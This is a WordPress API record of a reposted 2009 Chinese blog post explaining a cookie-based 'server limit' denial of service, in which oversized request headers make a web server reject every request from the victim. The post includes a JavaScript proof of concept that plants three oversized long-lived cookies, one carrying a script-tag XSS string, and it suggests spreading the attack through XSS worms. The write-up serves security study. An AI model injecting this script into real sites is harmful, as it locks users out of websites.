{"id":165,"date":"2009-12-06T14:37:09","date_gmt":"2009-12-06T14:37:09","guid":{"rendered":"http:\/\/www.houquner.com\/?p=602"},"modified":"2009-12-06T14:37:09","modified_gmt":"2009-12-06T14:37:09","slug":"server-limit-doszz","status":"publish","type":"post","link":"https:\/\/www.houquner.com\/index.php\/archives\/165","title":{"rendered":"server limit dos(zz)"},"content":{"rendered":"<p>zz : <a href=\"http:\/\/hi.baidu.com\/aullik5\/blog\/item\/6947261e7eaeaac0a7866913.html\">http:\/\/hi.baidu.com\/aullik5\/blog\/item\/6947261e7eaeaac0a7866913.html<\/a><\/p>\n<p>\u58a8\u897f\u54e5\u540c\u5b66\u5468\u672b\u5f88\u90c1\u95f7\u7684\u5728\u5bbe\u9986\u4e0a\u7f51\uff0c\u53d1\u73b0youtube\u88abban\u4e86\uff0c\u4e8e\u662f\u5199\u4e2a\u4e86tool\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\u3002\u987a\u5e26\u60f3\u5230\u4e86\u4e00\u79cd\u5229\u7528 google \u7edf\u8ba1\u7684\u6f0f\u6d1e\uff0c\u5199\u5728\u8fd9\u91cc\u4e86<\/p>\n<p><a href=\"http:\/\/sirdarckcat.blogspot.com\/2009\/04\/how-to-use-google-analytics-to-dos.html\">http:\/\/sirdarckcat.blogspot.com\/2009\/04\/how-to-use-google-analytics-to-dos.html<\/a><\/p>\n<p>\u8fd9\u4e2a\u95ee\u9898\u5b9e\u9645\u4e0a\u662f\u7531\u4e8e webserver \u7684 request field limit \u9020\u6210\u7684\u3002<\/p>\n<p>\u5f53 http request header \u8fc7\u957f\u65f6\uff0cwebserver \u4f1a\u4ea7\u751f\u4e00\u4e2a400 \u6216\u8005 4xx \u9519\u8bef<\/p>\n<p>Your browser sent a request that this server could not understand.<br \/>\nSize of a request header field exceeds server limit.<\/p>\n<p>\u5982\u679c\u8fd9\u4e9b\u8d85\u957f\u6570\u636e\u4fdd\u5b58\u5728cookie\u4e2d\uff0c\u6216\u8005\u80fd\u591f\u8ba9\u7528\u6237\u6bcf\u6b21\u8bbf\u95ee\u7684http \u5934\u90fd\u8d85\u957f\uff0c\u5c31\u4f1a\u5bfc\u81f4\u7528\u6237\u4e00\u76f4\u90fd\u65e0\u6cd5\u8bbf\u95ee\u8be5\u57df\u540d\uff0c\u4e5f\u5c31\u662fdos\u4e86\u3002<\/p>\n<p>sirdarckcat \u53d1\u73b0\u5728 google \u7684\u7edf\u8ba1\u9875\u9762\u4e2d\u5b58\u5728\u4e00\u4e2a set-cookie \u7684\u5730\u65b9\u6ca1\u6709\u63a7\u5236\uff0c\u7c7b\u4f3c\u7684\u5730\u65b9\u8fd8\u6709 \u641c\u7d22\u5f15\u64ce\u7684\u53c2\u6570\u4f1a\u5bfc\u81f4 referer \u8fc7\u957f<\/p>\n<p>\u8fd9\u4e9b\u7528\u6237\u80fd\u591f\u63a7\u5236\u7684\u5730\u65b9\u90fd\u4f1a\u5bfc\u81f4 http request field \u8d85\u957f\uff0c\u4ece\u800c\u5bfc\u81f4\u670d\u52a1\u5668\u8fd4\u56de\u4e00\u4e2a server limit \u7684\u9519\u8bef.<\/p>\n<p>\u6bcf\u4e2a webserver \u4e4b\u95f4\u90fd\u6709\u70b9\u5dee\u5f02\uff0c apache \u53ef\u80fd\u662f 8192 \u5b57\u8282\uff0c\u5177\u4f53\u53ef\u4ee5\u53c2\u8003\u8fd9\u91cc\uff1a<\/p>\n<p><a href=\"http:\/\/apache.active-venture.com\/mod\/core6.htm\">http:\/\/apache.active-venture.com\/mod\/core6.htm<\/a><\/p>\n<p>\u8304\u5b50\u4e0b\u5348\u6d4b\u8bd5\u4e86\u4e00\u4e0b\uff0c\u53d1\u73b0\u5728IE 8 \u4e2d\u53ef\u4ee5\u589e\u52a050\u4e2a cookie\uff0c\u7531\u4e8e\u6bcf\u4e2acookie\u7684\u9650\u5236\u662f 4k \uff08key, value \u5bf9\uff09\uff0c\u6240\u4ee5IE8 \u652f\u6301\u7684cookie\u5927\u5c0f\u4e3a 204k\u3002 \u8fd9\u4e5f\u662fIE 8\u65b0\u589e\u7684\uff0c\u4ee5\u524d\u6ca1\u8fd9\u4e48\u5927\u3002\u4e0d\u8fc7\u8fd9\u4e9b\u90fd\u8fdc\u8fdc\u8d85\u8fc7\u4e86\u4e00\u822c\u7684webserver\u7684\u9ed8\u8ba4 server limit \u503c<\/p>\n<p>btw: apache \u5bf9 http request body \u7684limite \u9ed8\u8ba4\u662f 2G.<\/p>\n<p>\u503c\u5f97\u6ce8\u610f\u7684\u662f\uff0c\u4f7f\u7528XSS\uff0c\u5c06\u53ef\u4ee5\u5199cookie\uff0c\u4ece\u800c\u5bfc\u81f4\u8fd9\u79cd server limit dos \u653b\u51fb\u3002<\/p>\n<p>\u6211POC\u4e86\u4e00\u4e0b\uff1a<\/p>\n<p>&lt;script language=&#8221;javascript&#8221;&gt;<br \/>\nalert(document.cookie);<\/p>\n<p>var metastr = &#8220;AAAAAAAAAA&#8221;; \/\/ 10 A<br \/>\nvar str = &#8220;&#8221;;<\/p>\n<p>while (str.length &lt; 4000){<br \/>\n\u00a0\u00a0\u00a0 str += metastr;<br \/>\n}<br \/>\nalert(str.length);<\/p>\n<p>document.cookie = &#8220;evil3=&#8221; + &#8220;&lt;script&gt;alert(xss)&lt;\/script&gt;&#8221; +&#8221;;expires=Thu, 18-Apr-2019 08:37:43 GMT;&#8221;;\u00a0\u00a0\u00a0 \/\/ \u4e00\u4e9b\u8001\u7248\u672c\u7684webserver\u53ef\u80fd\u5728\u8fd9\u91cc\u8fd8\u4f1a\u5b58\u5728XSS<\/p>\n<p>document.cookie = &#8220;evil1=&#8221; + str +&#8221;;expires=Thu, 18-Apr-2019 08:37:43 GMT;&#8221;;<\/p>\n<p>document.cookie = &#8220;evil2=&#8221; + str +&#8221;;expires=Thu, 18-Apr-2019 08:37:43 GMT;&#8221;;<\/p>\n<p>alert(document.cookie);<\/p>\n<p>&lt;\/script&gt;<\/p>\n<p>\u8fd0\u884c\u8fd9\u4e2a\u811a\u672c\u540e\uff0c\u4f1a\u5728\u5f53\u524d\u57df\u4e0b\u690d\u51653\u4e2acookie\uff0c\u603b\u957f\u5ea6\u8d85\u8fc78192\u5b57\u8282\uff0c \u4e4b\u540e\u518d\u8bf7\u6c42\u8be5\u57df\u5c31\u4f1a\u65e0\u6cd5\u8bbf\u95ee\u4e86\u3002<\/p>\n<p>\u56e0\u4e3a\u662f stored cookie, \u6240\u4ee5\u4f1a\u5bfc\u81f4\u8be5\u7528\u6237\u5728\u6e05\u7406cookie\u524d\u4e00\u76f4\u90fd\u65e0\u6cd5\u8bbf\u95ee\u8be5\u7f51\u7ad9\u3002<\/p>\n<p>\u5bf9\u4e8e\u4e92\u8054\u7f51\u7f51\u7ad9\u6765\u8bf4\uff0c\u7528\u6237\u624d\u662f\u6700\u91cd\u8981\u548c\u6700\u5b9d\u8d35\u7684\u8d44\u6e90\uff0c\u54ea\u6015\u7528\u6237\u7684\u5e10\u6237\u88ab\u76d7\u4e86\uff0c\u5bf9\u4e8e\u4e92\u8054\u7f51\u516c\u53f8\u7684\u7684\u635f\u5931\u53ef\u80fd\u90fd\u53ca\u4e0d\u4e0a\u7528\u6237\u65e0\u6cd5\u8bbf\u95ee\u7f51\u7ad9\u9020\u6210\u7684\u635f\u5931\u5927\u3002<\/p>\n<p>\u800c\u4f7f\u7528 XSS WORM \u6216\u8005\u662f \u5a01\u529b\u6bd4\u8f83\u5927\u7684 XSS\uff0c \u53ef\u4ee5\u8f7b\u6613\u7684\u9020\u6210\u6570\u5343\u3001\u6570\u4e07\u7684\u7528\u6237\u65e0\u6cd5\u8bbf\u95ee\u7f51\u7ad9\uff01<\/p>\n<p>\u8f6c\u8f7d\u8bf7\u6ce8\u660e\uff1a<a href=\"https:\/\/www.houquner.com\">Kermit\u7684\u7f51\u7ad9<\/a> &raquo; <a href=\"https:\/\/www.houquner.com\/index.php\/archives\/165\">server limit dos(zz)<\/a><\/p>","protected":false},"excerpt":{"rendered":"<p>zz : http:\/\/hi.baidu.com\/aullik5\/blog\/item\/6947261e7eaeaac0a7866913.html \u58a8\u897f\u54e5\u540c\u5b66\u5468\u672b\u5f88\u90c1\u95f7\u7684\u5728\u5bbe\u9986\u4e0a\u7f51\uff0c\u53d1\u73b0youtube\u88abban\u4e86\uff0c\u4e8e\u662f\u5199\u4e2a\u4e86tool\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\u3002\u987a\u5e26\u60f3\u5230 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-165","post","type-post","status-publish","format-standard","hentry","category-bjzm"],"_links":{"self":[{"href":"https:\/\/www.houquner.com\/index.php\/wp-json\/wp\/v2\/posts\/165"}],"collection":[{"href":"https:\/\/www.houquner.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.houquner.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.houquner.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.houquner.com\/index.php\/wp-json\/wp\/v2\/comments?post=165"}],"version-history":[{"count":0,"href":"https:\/\/www.houquner.com\/index.php\/wp-json\/wp\/v2\/posts\/165\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.houquner.com\/index.php\/wp-json\/wp\/v2\/media?parent=165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.houquner.com\/index.php\/wp-json\/wp\/v2\/categories?post=165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.houquner.com\/index.php\/wp-json\/wp\/v2\/tags?post=165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}